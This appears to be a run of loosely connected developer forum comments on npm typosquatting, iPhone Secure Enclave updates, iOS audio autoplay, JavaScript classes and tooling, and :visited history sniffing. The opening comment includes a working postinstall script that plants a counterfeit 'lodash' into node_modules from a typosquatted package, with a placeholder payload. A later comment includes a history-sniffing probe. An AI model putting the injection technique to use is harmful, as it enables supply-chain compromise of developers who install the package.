I've not tried this, but a similar but easier exploit would be to register packages with names close to existing popular package names, and then have a post-install script inject a modified version of the real package into the node_modules directory that also does something malicious. So you register the "lodasj" package instead of "lodash", and then write a post-install script that injects a malicious "lodash" package that re-exports all of the lodash API and also does something nasty. If someone makes a typo with "npm i lodasj" and doesn't notice the mistake, the machine that installs it, and anyone who depends on the package, is infected. I wonder how well policed NPM is against these kinds of malware attacks.
You can inject a version of whatever you want into the node_modules folder from the post-install script though, can't you? So you just copy your own malicious lodash into node_modules. I haven't tried it, but I think it'd work.
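A minimal sketch of the mechanism, assuming npm's postinstall hook; the package name, the paths, and the bundled copy of lodash are all made up:

    // package.json of the hypothetical typosquatted "lodasj" package
    {
      "name": "lodasj",
      "version": "1.0.0",
      "main": "index.js",
      "scripts": { "postinstall": "node inject.js" }
    }

    // inject.js - npm runs this automatically after "npm i lodasj"
    const fs = require('fs');
    const path = require('path');

    // node_modules/lodasj/.. is node_modules, so this targets a sibling "lodash" dir
    const target = path.join(__dirname, '..', 'lodash');
    fs.mkdirSync(target, { recursive: true });
    fs.writeFileSync(path.join(target, 'package.json'),
      JSON.stringify({ name: 'lodash', version: '4.17.21', main: 'index.js' }));
    // stand-in "payload": re-export a bundled copy of the real lodash
    // (the console.log is where the nasty part would go)
    fs.writeFileSync(path.join(target, 'index.js'),
      "console.log('this could be anything');\n" +
      "module.exports = require('lodasj/vendor/lodash.js');\n");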
The only statement I could find from Apple was in the iOS security guide, which states that "it utilizes its own secure boot and personalized software update separate from the application processor." I think we can both agree that's a pretty vague statement; if you have a better source, I'd like to see it.
"The executives — speaking on background — also explicitly stated that what the FBI is asking for — for it to create a piece of software that allows a brute force password crack to be performed — would also work on newer iPhones with its Secure Enclave chip"
I understand that the boot chain is the only way Apple can modify the behaviour of the Enclave, but how would the update be forced? DFU wipes the class key, making any attempt to brute force the phone useless. And if debug pinout access is available, why does the FBI need Apple to access the phone at all?
I think the confusion stems from the iOS security guide that Apple published. Page 7 of the guide states that "The Secure Enclave is a coprocessor fabricated in the Apple A7 or later A-series processor. It utilizes its own secure boot and personalized software update separate from the application processor," which implies that updating it is somehow more secure, without saying exactly how much control Apple has over updating it, or whether the phone needs to be unlocked before it accepts new firmware. Given that they haven't come out and said that they can't override the firmware on locked phones, I'd say they can. Although, before Apple's recent statements I would have assumed that they couldn't, so the confusion is understandable. The guide's at https://www.apple.com/business/docs/iOS_Security_Guide.pdf
I agree, but I wish they had added a permissions dialog instead of outright blocking. If a site injects an autoplaying audio tag, iOS could prompt you once to ask whether that behaviour is OK for that particular domain. Apple's creative interpretation of standards is pretty annoying to me as both a user and a developer; sometimes auto-playing audio is actually wanted, in games for instance.
Moreover I think the whole "let the user decide" attitude is just a lame excuse developers hide behind when they can't figure out a decent UX. (It's no wonder design-by-committee software like we see on desktop Linux has so many UI options... Nobody can come up with anything people can agree on so "make it a checkbox so the user can decide" becomes the solution.)
Unsolicited sound is a horrible idea on any platform; it's a good thing that iOS only allows it when there's a touch event somewhere in the call stack. Dialogs would only worsen the problem; disallowing it altogether is the only sane solution.
Developers do lean on users too much to solve UX problems, but I still maintain that giving users a choice here would have been the better alternative. Access to device sensors is almost always behind some kind of permissions dialog on major platforms. Personally, I like the web/iOS model best: it prompts me when an app/site wants to use my microphone, GPS, camera, etc., and then remembers the choice I've made. Making potentially invasive or offensive application behaviour completely transparent to the user is good user experience in my book, and it discourages developers from using those sensors unless they actually need them. Although I can concede, judging from the small sample size here, that requiring permission for unsolicited access to the phone's speaker might be going too far, and I'm just as annoyed by the recent auto-playing video trend on the web as anyone else.
Unsolicited sound is pretty important for games, and increasingly the web is becoming a pretty good platform for them. I wrote a little game a while back, and I worked around the sound issue in Safari by initializing my sounds (just a few) on the user's first tap. Not a back-breaking workaround or anything, but still annoying that I had to work around Safari. Here's the thing though: if I hadn't been testing on iOS, a critical part of my game (and the sound actually was critical) would have been broken there. I guess I'm just grumpy about that... :-/
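The workaround looks roughly like this; a sketch using the Web Audio API, where the silent-buffer trick and the handler name are just my own plumbing:

    // Safari/iOS will only start audio from inside a user-gesture handler,
    // so create (or resume) the AudioContext on the first touch and reuse it.
    var audioCtx = null;

    function unlockAudio() {
      var Ctx = window.AudioContext || window.webkitAudioContext;
      if (!audioCtx) audioCtx = new Ctx();
      if (audioCtx.state === 'suspended') audioCtx.resume();

      // play a one-sample silent buffer so later, programmatic sounds are allowed
      var source = audioCtx.createBufferSource();
      source.buffer = audioCtx.createBuffer(1, 1, 22050);
      source.connect(audioCtx.destination);
      source.start(0);

      document.removeEventListener('touchend', unlockAudio);
    }

    document.addEventListener('touchend', unlockAudio, false);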
Is his entire complaint that the syntax looks too much like Java? The fact is, people are already using prototypes to share common methods across objects, and classes are really just nice, short syntactic sugar for doing that. His comment on classes is too flippant for me to even work out what his complaint actually is.
Beyond that, I'd argue that classes give you more guarantees about how an object will behave at the expense of flexibility, although they still give you escape hatches if you want them. The reduced flexibility is really nice because you can define safe subsets of the language in which tools that analyze and refactor code are possible, even across files if you're using the module system. Moving the language in a direction where consistent, universal tooling is possible to write is something that I love about classes, and it's often overlooked in discussions about them. I don't care that classes are just a simplified subset of what's possible using prototypes; they cover the common case well enough and make it possible to write really nice code completion and refactoring tools that don't randomly break. That's worth all the extra magic in my opinion.
People do weird metaprogramming things with the existing constructs. In a lot of cases it's because people prefer to keep things DRY, but it hurts when you're trying to grep through a large codebase to find that one method you need. A contrived example:
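Imagine an api.js that builds its method names at runtime (the module and every name in it are made up):

    // api.js - a hypothetical module that builds its exports at runtime
    function request(verb, path, body) { /* imagine an HTTP call here */ }
    function capitalize(s) { return s[0].toUpperCase() + s.slice(1); }

    var resources = ['user', 'post', 'comment'];
    var verbs = ['get', 'create', 'delete'];

    resources.forEach(function (resource) {
      verbs.forEach(function (verb) {
        // defines getUser, createUser, deleteUser, getPost, ... on the exports object
        module.exports[verb + capitalize(resource)] = function (id, body) {
          return request(verb, '/' + resource + 's/' + (id || ''), body);
        };
      });
    });

    // grep the codebase for "deleteComment" and you'll never find where it's defined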
It's impossible to statically infer what methods are being declared in ES5 code in general. You can pick up on some common assignment patterns, but not all the weird stuff people do. Just check out the top 10 NPM modules and I guarantee you'll find some odd assignment patterns; I remember the "colors" module doing meta stuff the last time I checked. You can't just run the code to find out what the module exports either, because of potential side effects from IO. You can wrap Node's core IO modules, but that solution is specific to Node and still won't cover every possible case. In short, it's a huge pain to write tools that pull information out of JavaScript code in general, and that hurts the tooling ecosystem around JavaScript.
With the class pattern you at least have some statically inferable information you can be sure of pulling out of the class, and weird stuff is discouraged. I know that in some ways this is a weak argument, because of the new square-bracket (computed property) syntax, and the fact that anyone can muck with the prototype of the class after it's created. Even so, for the simple OLOO case it encourages people to write code whose method names can easily be statically inferred, and that's a good thing for JS tooling possibilities.
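For contrast, here's that same made-up API as a class; every method name sits in the source text where a tool can read it:

    // api.js - the same hypothetical API as a class
    class Api {
      getUser(id) { return this.request('get', '/users/' + id); }
      createUser(body) { return this.request('create', '/users/', body); }
      deleteComment(id) { return this.request('delete', '/comments/' + id); }

      request(verb, path, body) { /* imagine an HTTP call here */ }
    }

    module.exports = Api;
    // a grep or a completion engine can find deleteComment without ever running the code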
I really just want omnicompletion that doesn't randomly break on me! The OLOO pattern is incredibly common in JS.
Do you have an example of this working? I thought browser vendors were having the :visited selector lie to you when you call getComputedStyle on those links. Also, how would you work around the need for JS? I understand that you can do something similar with tracking pixels, but I'm under the impression that Ghostery blocks them.
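For reference, the kind of check I assumed no longer works is roughly this (the URL and the colour are made up):

    // classic history-sniffing check, which is exactly what vendors neutered
    // stylesheet somewhere:  a:visited { color: rgb(255, 0, 0); }
    var probe = document.createElement('a');
    probe.href = 'https://example.com/';   // URL being probed
    document.body.appendChild(probe);

    var wasVisited = getComputedStyle(probe).color === 'rgb(255, 0, 0)';
    document.body.removeChild(probe);
    // modern browsers report the unvisited colour here, so wasVisited stays false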
Interesting papers, thanks for calling my attention to them. They made me paranoid enough to disable the styling of visited links in Firefox to head off the large number of timing attacks that are possible.